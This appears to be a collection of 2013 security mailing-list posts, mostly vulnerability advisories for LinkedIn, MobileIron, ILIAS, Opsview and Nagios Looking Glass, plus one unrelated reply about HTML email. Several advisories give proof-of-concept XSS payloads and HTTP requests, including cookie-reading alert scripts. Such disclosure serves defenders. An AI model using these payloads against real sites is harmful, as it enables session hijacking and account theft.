= INTERNET SECURITY AUDITORS ALERT 2013-003 - Original release date: March 3rd, 2013 - Last revised: March 10th, 2013 - Discovered by: Vicente Aguilera Diaz - Severity: 4.3/10 (CVSSv2 Base Score) = I. VULNERABILITY - XSS vulnerability in LinkedIn. II. BACKGROUND - LinkedIn is a social networking service and website (www.linkedin.com) for professionals. The site officially launched on May 5, 2003. As of September 30, 2012 (the end of the third quarter), professionals are signing up to join LinkedIn at a rate of approximately two new members per second. Actually, Over 200 million professionals use LinkedIn to exchange information, ideas and opportunities. More info: http://www.linkedin.com III. DESCRIPTION - Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page. LinkedIn is vulnerable to XSS attacks during a DWR (Direct Web Remoting, a Java open source library) call through the c0-id parameter. There are several instances of this issue: https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreativeText.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.getBidSuggestion.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.validateClickThroughUrl.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.getCostAndMemberCount.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.validateRequiredFields.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.validateDisplayUrl.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.getExampleAds.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.changeBizAcctName.dwr https://www.linkedin.com/ads/dwr/exec/SasAjax.updateAlertMessageId.dwr IV. PROOF OF CONCEPT - Next, we show a typical request to the /ads/dwr/exec/SasAjax.validateCreative.dwr resource: POST /ads/dwr/exec/SasAjax.validateCreative.dwr HTTP/1.1 Host: www.linkedin.com ...other-HTTP-headers... callCount=1 JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9 c0-scriptName=SasAjax c0-methodName=validateCreative c0-id=5518_1360723319833 c0-param0=string: c0-param1=string: c0-param2=string: c0-param3=string: c0-param4=string: c0-param5=string: c0-param6=string:en_US c0-param7=string:0 c0-param8=string:0 c0-param9=number:0 xml=true Some parameters are not used/validated by the application, so we can remove these parameters from the request. The only parameters that are required by the application are: - callCount - JSESSIONID == can have anything value, but must match the JSESSIONID cookie - c0-id == vulnerable parameter (we can inject HTML/script code through this parameter) - xml == we need to change the value from true (default value) to false to make possible the script code injection Also, we can use HTTP GET method instead the HTTP POST method used at this request. This makes it more easy the exploitation of the XSS vulnerability. For example, we can inject script code to show an alert popup with the document.cookie value: c0-id=5518_1360723319833');/SCRIPTSCRIPTalert(document.cookie);/SCRIPT!-- So, finally, this HTTP request provoke the XSS exploitation:: https://www.linkedin.com/ads/dwr/exec/SasAjax.validateCreative.dwr?callCount=1JSESSIONID=0B3F07B2742AF0F5A020AB0FB72123D9c0- id=5578_1362323397833');/SCRIPTSCRIPTalert(document.cookie);/SCRIPT!--xml=false V. BUSINESS IMPACT - A malicious user can access to the information stored in the cookie on other users, so the attacker can spoof they identity and access to these user accounts. VI. SYSTEMS AFFECTED - http://www.linkedin.com VII. SOLUTION - Pending. VIII. REFERENCES - http://www.linkedin.com http://www.isecauditors.com https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) IX. CREDITS - This vulnerability has been discovered and reported by Vicente Aguilera Diaz, vaguilera (at) isecauditors (dot)
[scip_Advisory 10847] MobileIron 4.5.4 Device Registration regpin Cross Site Scripting
MobileIron 4.5.4 Device Registration regpin Cross Site Scripting scip AG Vulnerability ID 10847 (10/28/2013) http://www.scip.ch/en/?vuldb.10847 I. INTRODUCTION MobileIron is a commercial solution to provide secure access to mobile users in corporate environments. More information is available on the official web site at the following URL: http://www.mobileiron.com/ II. DESCRIPTION Pascal Schaufelberger at scip AG found a cross site scripting vulnerability in the older release 4.5.4. An attacker is able to inject arbitrary script code without former authentication. III. SCORING CVSSv2 Base Score: 7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P) CVSSv2 Temp Score: 5.9 (CVSS2#E:POC/RL:OF/RC:C) IV. EXPLOITATION The attack requires access to the device registration form. The attack attempt can be initiated with the following url: https://www.example.com/mifs/c/i/reg/reg.html?regpin=12345;scriptalert('scip')/script V. IMPACT This is a traditional reflected cross site scripting vulnerability, which allows the injection of arbitrary script code. An attacker might be able to alter the behavior of the web site and might therefore attack visitors. VI. DETECTION Cross site scripting pattern in the regpin field should be detected and eliminated. Most security solutions provide this function out of the box. VII. SOLUTION This issue got fixed in release 5.1.0 without further notification. Current release is 5.8, which has been available since October 2013. VIII. VENDOR RESPONSE The issue has been reported to the vendor via email. The communication was very efficient and friendly. After exchange of technical details the vendor informed that this issue was known already and has been patched without further notice. IX. SOURCES scip AG - Security is our Business http://www.scip.ch scip AG - Vulnerability Database http://www.scip.ch/en/?vuldb.10847 X. DISCLOSURE TIMELINE 2013/09/28 Identification of the vulnerability 2013/10/14 First contact to MobileIron via Twitter 2013/10/15 Got mail address of MobileIron security contact 2013/10/16 Initial confirmation of our submission by MobileIron 2013/10/18 Detailed description of further actions by MobileIron 2013/10/18 Confirmation of next steps by scip AG 2013/10/28 Public disclosure of the advisory XI. CREDITS The vulnerability has been discovered by Pascal Schaufelberger. Pascal Schaufelberger, scip AG, Zuerich, Switzerland pasc-at-scip.ch http://www.scip.ch The disclosure process has been handled by Marc Ruef. Marc Ruef, scip AG, Zuerich, Switzerland maru-at-scip.ch http://www.scip.ch A1. LEGAL NOTICES Copyright (c) 2002-2013 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory.
[PT-2013-46] Local File Include in Nagios Looking Glass
--- (PT-2013-46) Positive Technologies Security Advisory Local File Include in Nagios Looking Glass --- ---[ Vulnerable software ] Nagios Looking Glass Version: 1.1.0 beta 2 and earlier Link: http://exchange.nagios.org/directory/Addons/Frontends-(GUIs-and-CLIs)/Web-Interfaces/Nagios-Looking-Glass/details ---[ Severity level ] Severity level: High Impact: Files Reading Access Vector: Remote CVSS v2: Base Score: 7.8 Vector: (AV:N/AC:L/Au:N/C:C/I:N/A:N) CVE: not assigned ---[ Software description ] Nagios Looking Glass (NLG) is a web-based interface for Nagios that allows you to show at-a-glance, real-time server status to 3rd parties without giving them direct access to Nagios. ---[ Vulnerability description ] The specialists of the Positive Research center have detected a Local File Include vulnerability in Nagios Looking Glass. Application don't validates input data. That allows attackers to read config file. To exploit this vulnerability remote attacker shouldn't have privileges in Nagios Looking Glass. Vulnerability exists in server/s3_download.php. ---[ How to fix ] No solution ---[ Advisory status ] 19.07.2013 - Vendor gets vulnerability details 13.08.2013 - Vulnerability details were sent to CERT 28.10.2013 - Public disclosure ---[ Credits ] The vulnerability was detected by Vyacheslav Egoshin, Positive Research Center (Positive Technologies Company) ---[ References ] http://en.securitylab.ru/lab/PT-2013-46 Reports on the vulnerabilities previously discovered by Positive Research: http://www.ptsecurity.com/research/advisory/ http://en.securitylab.ru/lab/
Re: Call for Papers, 2014 Symposium on Protocols and Rules for Security (SPRS2014)
td style=PADDING-BOTTOM: 5px; LINE-HEIGHT: 22px; PADDING-LEFT: 5px; PADDING-RIGHT: 5px; FONT-FAMILY: Times New Roman; COLOR: #2b2b2b; FONT-SIZE: 19px; PADDING-TOP: 5px align=leftp style=line-height:23px;font-size:20px;Dear Colleagues,/p pWe would like to cordially invite you to submit or recommend papers to 2014 Symposium on Protocols and Rules for Security (SPRS2014)! May I suggest rule 1. Don't send html only email to enable rule 2. Don't render html email unless you're sure it's what it claims to be and you are sure it is safe. Actually just don't, you know someone in your organisation will get phished, putting others at risk. Just strip the html at your MTA, you can do this because of rule 1. regards brandon
ILIAS eLearning 4.3.4 4.4 CMS - Persistent Notes Web Vulnerability
Document Title: === ILIAS eLearning 4.3.4 4.4 CMS - Persistent Notes Web Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1122 Release Date: = 2013-10-27 Vulnerability Laboratory ID (VL-ID): 1122 Common Vulnerability Scoring System: 3.9 Product Service Introduction: === ILIAS is a web base learning management system (LMS, VLE). Features: Courses, SCORM 1.2 and 2004, mail, forum, chat, groups, podcast, file sharing, authoring, CMS, test, wiki, personal desktop, LOM, LDAP, role based access. (Copy of the Homepage: http://sourceforge.net/projects/ilias/ ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the ILIAS eLearning v4.3.4 v4.4 CMS web-application. Vulnerability Disclosure Timeline: == 2013-10-27:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): ILIAS Product: ILIAS eLearning - Content Management System 4.3.4 4.4 Exploitation Technique: === Remote Severity Level: === Medium Technical Details Description: A persistent input validation web vulnerability is detected in the ILIAS eLearning v4.3.4 v4.4 CMS web-application. The bug allows an attacker (remote) to implement/inject malicious own malicious persistent script codes (application side). The persistent web vulnerability is located in the `Notes Comments` module. Remote attackers are able to inject own malicious script code via POST method request in the vulnerable comment or note parameters. The execute occurs in the in the comments and private notes modules of the admin panel. Exploitation of the persistent web vulnerability requires low user interaction and a low privileged web-application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or persistent module context manipulation. Request Method(s): [+] POST Vulnerable Module(s): [+] Notes [+] Comments Vulnerable Parameter(s): [+] note Affected Module(s): [+] Private Notes [+] Comments Review Proof of Concept (PoC): === The persistent input validation web vulnerability can be exploited by remote attackers with low user interaction and low privileged web-application user account. For demonstration or to reproduce ... PoC: Public Comments private Notes div class=ilNote a name=note_35!-- img src=./templates/default/images/note_unlabeled.png alt=Note title=Note border=0 style=vertical-align:text-bottom; margin-bottom:2px;/ --/a span class=small light Last edited on 26. Oct 2013/span div class=ilNoteTexth4 class=ilNoteTitle/h4%20%20[PERSISTENT INJECTED SCRIPT CODE!] /div/div --- PoC Session Logs --- Status: 302[Found] POST http://ilias.localhost:8080/ilias.php? note_type=1cmd=postcmdClass=ilnoteguicmdNode=eu:jl:jkbaseClass=ilPersonalDesktopGUIfallbackCmd=getNotesHTMLrtoken=2d302c4c574f61fc880f393433703e1b Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[20] Mime Type[text/html] Request Headers: Host[ilias.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://ilias.localhost:8080/ilias.php?note_type=1¬e_id=35cmd=editNoteFormcmdClass=ilnoteguicmdNode=eu:jl:jkbaseClass=ilPersonalDesktopGUI] Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; authchallenge=459071aa3327de70506cb2a465507bf5] Connection[keep-alive] Post Data: note[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvulnerability-lab.com%2F%3E%40gmail.com%0D%0A%3E %22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cdiv+style%3D%221%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28 document.cookie%29%3C%2Fscript%3E%40gmail.com] cmd%5BupdateNote%5D[Update+Note] note_id[35] Response Headers: Date[Sat, 26 Oct 2013 21:12:44 GMT] Server[Apache/2.2.22 (Ubuntu)] X-Powered-By[PHP/5.3.10-1ubuntu3.8] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Location[http://ilias.localhost:8080/ilias.php?note_mess=modcmd=showNotescmdClass=ilnoteguicmdNode=eu:jl:jkbaseClass=ilPersonalDesktopGUI#notes_top] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[20]
CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View
CVE-2013-5695 Multilple Cross Site Scripting (XSS) Attacks in Ops View Version(s): Opsview pre 4.4.1 Author: J. Oquendo (joquendo at e-fensive dot net) I. ADVISORY Title: Multilple Cross Site Scripting (XSS) Attacks in Ops View Date published: 2013-10-28 Vendor contacted: 2013-09-04 II. BACKGROUND Opsview is a systems management software built on open source software. To minimize noise, read more about it here http://www.opsview.com/about-us II. DESCRIPTION Opsview is vulnerable to a few different XSS based attacks. /admin/auditlog /info/host/ /login /status/service/recheck /viewport/ There are a variety of iterations within those functions which may allow a malicious user to trigger a cross site scripting attack. III. EXAMPLE GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT HERE%3e HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] POST /login HTTP/1.1 Content-Length: 125 Content-Type: application/x-www-form-urlencoded Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] app=OPSVIEWback=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22login=Sign+inlogin_password=nologin_username=no POST /status/service/recheck HTTP/1.1 Content-Length: 144 Content-Type: application/x-www-form-urlencoded User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22host_selection=opsviewservice_selection=opsview%3bConnectivity%20-%20LANsubmit=Submit GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1 Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] Host: 10.20.30.68:80 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Opera/5.54 (Windows NT 5.1; U) [en] III SOLUTION Opsview released a fix with Opsview 4.4.1 http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM Where ignorance is our master, there is no possibility of real peace - Dalai Lama 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AF http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF